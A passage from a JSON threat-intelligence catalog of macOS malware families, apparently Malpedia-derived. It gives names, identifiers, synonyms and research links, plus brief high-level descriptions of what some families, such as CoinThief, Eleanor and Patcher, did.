"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://securelist.com/operation-applejeus-sequel/95596/", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", "https://securelist.com/operation-applejeus/87553/", "https://objective-see.com/blog/blog_0x5F.html", "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://objective-see.com/blog/blog_0x49.html" ], "synonyms": [], "type": [] }, "uuid": "ca466f15-8e0a-4030-82cb-5382e3c56ee5", "value": "AppleJeus (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", "https://threatintel.blog/OPBlueRaven-Part2/", "https://github.com/kai5263499/Bella", "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", "value": "Bella" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore", "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c", "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [ "SurfBuyer" ], "type": [] }, "uuid": "5f5f5496-d9f8-4984-aa66-8702741646fe", "value": "Bundlore" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" ], "synonyms": [ "Appetite", "Mask" ], "type": [] }, "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", "value": "Careto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.casso", "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/" ], "synonyms": [], "type": [] }, "uuid": "387e1a19-458d-4961-a8e4-3f82463085e5", "value": "Casso" }, { "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn’t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher‘s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim’s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker’s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim’s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim’s hard drive to a remote server\r\n- update itself to a newer version", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/" ], "synonyms": [], "type": [] }, "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", "value": "CoinThief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", "https://objectivebythesea.com/v2/talks/OBTS_v2_Seele.pdf", "https://objective-see.com/blog/blog_0x2A.html" ], "synonyms": [], "type": [] }, "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", "value": "Coldroot RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" ], "synonyms": [], "type": [] }, "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", "value": "CpuMeaner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", "https://objective-see.com/blog/blog_0x29.html", "https://digitasecurity.com/blog/2018/02/05/creativeupdater/" ], "synonyms": [], "type": [] }, "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", "value": "CreativeUpdater" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" ], "synonyms": [], "type": [] }, "uuid": "2bb6c494-8057-4d83-9202-fda3284deee4", "value": "Crisis" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" ], "synonyms": [], "type": [] }, "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", "value": "Crossrider" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability", "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://www.sygnia.co/mata-framework", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://objective-see.com/blog/blog_0x5F.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", "https://objective-see.com/blog/blog_0x57.html", "https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/" ], "synonyms": [], "type": [] }, "uuid": "81def650-f52e-49a3-a3fe-cb53ffa75d67", "value": "Dacls (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.darthminer", "https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/" ], "synonyms": [], "type": [] }, "uuid": "a8e71805-014d-4998-b21e-3125da800124", "value": "DarthMiner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", "https://www.f-secure.com/weblog/archives/00002466.html" ], "synonyms": [], "type": [] }, "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", "value": "Dockster" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", "https://objective-see.com/blog/blog_0x32.html" ], "synonyms": [], "type": [] }, "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", "value": "Dummy" }, { "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim’s webcam\r\n- Sending emails with an attachment", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor", "https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/" ], "synonyms": [], "type": [] }, "uuid": "c221e519-fe3e-416e-bc63-a2246b860958", "value": "Eleanor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat", "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", "https://objective-see.com/blog/blog_0x61.html" ], "synonyms": [], "type": [] }, "uuid": "f8ccf928-7d4f-4999-91a5-9222f148152d", "value": "ElectroRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", "https://github.com/Marten4n6/EvilOSX", "https://twitter.com/JohnLaTwC/status/966139336436498432" ], "synonyms": [], "type": [] }, "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", "value": "EvilOSX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest", "https://github.com/gdbinit/evilquest_deobfuscator", "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/", "https://objective-see.com/blog/blog_0x59.html", "https://objective-see.com/blog/blog_0x5F.html", "https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/", "https://twitter.com/dineshdina04/status/1277668001538433025" ], "synonyms": [ "ThiefQuest" ], "type": [] }, "uuid": "d5b39223-a8cc-4d47-8030-1d7d6312d351", "value": "EvilQuest" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.failytale", "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/" ], "synonyms": [], "type": [] }, "uuid": "5dfd704c-a69d-4e93-bd70-68f89fbbb32c", "value": "FailyTale" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher", "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/", "https://objective-see.com/blog/blog_0x4F.html", "https://objective-see.com/blog/blog_0x5F.html", "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" ], "synonyms": [], "type": [] }, "uuid": "89ce536c-03b9-4f69-83ce-723f26b36494", "value": "FinFisher (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", "https://en.wikipedia.org/wiki/Flashback_(Trojan)", "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" ], "synonyms": [ "FakeFlash" ], "type": [] }, "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", "value": "FlashBack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", "https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf", "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/" ], "synonyms": [ "Quimitchin" ], "type": [] }, "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", "value": "FruitFly" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera", "https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/", "https://objective-see.com/blog/blog_0x53.html", "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/" ], "synonyms": [ "Kassi", "StockSteal" ], "type": [] }, "uuid": "1c65cf4e-5df4-4d56-a414-7b05f00814ba", "value": "Gmera" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" ], "synonyms": [], "type": [] }, "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", "value": "HiddenLotus" }, { "description": "The threat was a multi-stage malware displaying a decoy that appeared to the victim as a Chinese language article on the long-running dispute over the Diaoyu Islands; an array of erotic pictures; or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and Imuler was the backdoor capable of the following operations:\r\n\r\n- capture screenshots\r\n- exfiltrate files to a remote computer\r\n- send various information about the infected computer\r\n- extract ZIP archive\r\n- download files from a remote computer and/or the Internet\r\n- run executable files", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", "https://www.welivesecurity.com/2012/03/16/osximuler-updated-still-a-threat-on-mac-os-x/", "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" ], "synonyms": [ "Revir" ], "type": [] }, "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", "value": "iMuler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab", "https://archive.f-secure.com/weblog/archives/00002576.html", "https://securelist.com/deathstalker-mercenary-triumvirate/98177/", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.macmark.de/blog/osx_blog_2013-08-a.php", "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/", "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html" ], "synonyms": [], "type": [] }, "uuid": "01325d85-297f-40d5-b829-df9bd996af5a", "value": "Janicab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", "https://objective-see.com/blog/blog_0x16.html", "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html", "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/" ], "synonyms": [], "type": [] }, "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", "value": "KeRanger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", "https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/", "https://github.com/eset/malware-ioc/tree/master/keydnap", "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", "value": "Keydnap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", "https://www.f-secure.com/weblog/archives/00002558.html" ], "synonyms": [ "KitM" ], "type": [] }, "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", "value": "Kitmos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://objective-see.com/blog/blog_0x16.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/" ], "synonyms": [ "JHUHUGIT", "JKEYSKW", "SedUploader" ], "type": [] }, "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", "value": "Komplex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", "https://objective-see.com/blog/blog_0x16.html", "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" ], "synonyms": [], "type": [] }, "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", "value": "Laoshu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis", "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/" ], "synonyms": [], "type": [] }, "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", "value": "Leverage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://iranthreats.github.io/resources/macdownloader-macos-malware/" ], "synonyms": [], "type": [] }, "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", "value": "MacDownloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", "value": "MacInstaller" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", "https://objective-see.com/blog/blog_0x1E.html", "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service" ], "synonyms": [], "type": [] }, "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", "value": "MacRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" ], "synonyms": [], "type": [] }, "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", "value": "MacSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", "value": "MacVX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", "https://objective-see.com/blog/blog_0x26.html" ], "synonyms": [], "type": [] }, "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", "value": "MaMi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt", "https://twitter.com/BitsOfBinary/status/1321488299932983296", "https://twitter.com/BitsOfBinary/status/1337330286787518464", "https://www.anquanke.com/post/id/223817" ], "synonyms": [], "type": [] }, "uuid": "f85c3ec9-81f0-4dee-87e6-b3f6b235bfe7", "value": "Manuscrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/", "https://objective-see.com/blog/blog_0x16.html", "https://objective-see.com/blog/blog_0x53.html" ], "synonyms": [], "type": [] }, "uuid": "bfbb6e5a-32dc-4842-936c-5d8497570c74", "value": "Mokes (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", "https://objective-see.com/blog/blog_0x20.html" ], "synonyms": [], "type": [] }, "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", "value": "Mughthesec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/", "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/", "https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468", "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam" ], "synonyms": [], "type": [] }, "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", "value": "OceanLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", "https://news.drweb.com/show/?i=1750&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", "value": "Olyx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.osaminer", "https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" ], "synonyms": [], "type": [] }, "uuid": "89d0c423-c4ff-46e8-8c79-ea5e974e53e7", "value": "OSAMiner" }, { "description": "This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software like Adobe Premiere Pro or Microsoft Office for Mac.\r\n\r\nThe downloaded torrent contained an application bundle in the form of a single zip file. After launching the fake application, the main window of the fake cracking tool was displayed.\r\n\r\nThe file encryption process was launched after the misguided victim clicked 'Start'. Once executed, the ransomware generated a random 25-character string and set it as the key for RC4 encryption of all of the user's files. It then demanded ransom in Bitcoin, as instructed in the 'README!' .txt file copied all over the user's directories.\r\n\r\nDespite the instructions being quite thorough, Patcher lacked the functionality to communicate with any C&C server, and therefore made it impossible for its operators to decrypt affected files. The randomly generated encryption key was also too long to be guessed via a brute-force attack, leaving the encrypted data unrecoverable in a reasonable amount of time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" ], "synonyms": [ "FileCoder", "Findzip" ], "type": [] }, "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", "value": "Patcher" }, { "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", "https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/" ], "synonyms": [], "type": [] }, "uuid": "de13bec0-f443-4c5a-91fe-2223dad43be5", "value": "PintSized" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf" ], "synonyms": [], "type": [] }, "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", "value": "Pirrit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", "https://securelist.com/calisto-trojan-for-macos/86543/", "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", "https://objective-see.com/blog/blog_0x1F.html", "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://objective-see.com/blog/blog_0x1D.html", "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" ], "synonyms": [ "Calisto" ], "type": [] }, "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", "value": "Proton RAT" }, { "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet", "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" ], "synonyms": [], "type": [] }, "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", "value": "Pwnet" }, { "description": "Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" ], "synonyms": [ "Retefe" ], "type": [] }, "uuid": "80acc956-d418-42e3-bddf-078695a01289", "value": "Dok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer", "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://securelist.com/shlayer-for-macos/95724/" ], "synonyms": [], "type": [] }, "uuid": "c3ee82df-a004-4c68-89bd-eb4bb2dfc803", "value": "Shlayer" }, { "description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s new M1 chips but has been distributed without payload so far.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow", "https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis" ], "synonyms": [], "type": [] }, "uuid": "f6a7aeeb-fcc5-4d26-9eab-c0b6e2819a6c", "value": "Silver Sparrow" }, { "description": "General purpose backdoor", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" ], "synonyms": [], "type": [] }, "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", "value": "systemd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami", "https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks" ], "synonyms": [], "type": [] }, "uuid": "59d4a2f3-c66e-4576-80ab-e04a4b0a4317", "value": "Tsunami (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.unidentified_001", "https://objective-see.com/blog/blog_0x51.html", "https://securelist.com/operation-applejeus-sequel/95596/" ], "synonyms": [], "type": [] }, "uuid": "1c96f6b9-6b78-4137-9d5f-aa5575f80daa", "value": "Unidentified macOS 001 (UnionCryptoTrader)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" ], "synonyms": [], "type": [] }, "uuid": "13173d75-45f0-4183-8e18-554a5781405c", "value": "Uroburos (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram", "https://twitter.com/ConfiantIntel/status/1351559054565535745" ], "synonyms": [ "WizardUpdate" ], "type": [] }, "uuid": "021e2fb4-1744-4fde-8d59-b247f1b34062", "value": "Vigram" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.watchcat", 